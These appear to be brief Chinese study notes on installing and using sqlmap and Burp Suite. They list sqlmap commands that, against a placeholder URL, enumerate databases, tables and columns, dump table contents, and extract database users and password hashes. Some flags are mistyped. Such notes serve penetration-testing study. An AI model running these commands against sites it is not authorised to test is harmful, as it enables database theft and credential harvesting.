官网下载python2.7

sqlmap最新版

设置环境变量，cmd运行sqlmap.py

当注入点后面的参数大于2时，加英文双引号

空格 — batch，自动按照默认执行

burp抓包，判断文本中请求是否存在注入 ,sqlmap.py -r  1.txt

查询当前用户下的所有数据库 sqlmap.py -u 链接 –dbs

获取数据库中的表名 sqlmap.py -u links -D 数据库 –tables（不指定数据库，会列出所有数据库下的所有表）

获取表中的字段名（列名）sqlmap.py  -u  links  -D security  -T users(表名)  –columns

获取字段内容 sqlmap.py -u links -D security -T users -C id.password.username –dump

获取数据库中所有的用户（数据库的用户） sqlmap.py -u links –users

获取数据库用户的密码 sqlmap.py -u links –passwords

获取当前网站数据库的名称 sqlmap.py -u links –current-db

获取当前网站数据库的用户名称 sqlmap.py -u links –current-user

burp的安装

安装java jbk，设置环境变量

新建系统变量 JAVA_HOME  java/jdk

path java/jdk/bin

cmd输入javac，出现 “可能的选项” 这样的汉字提示，说明安装成功。

下载 Burp Suite Community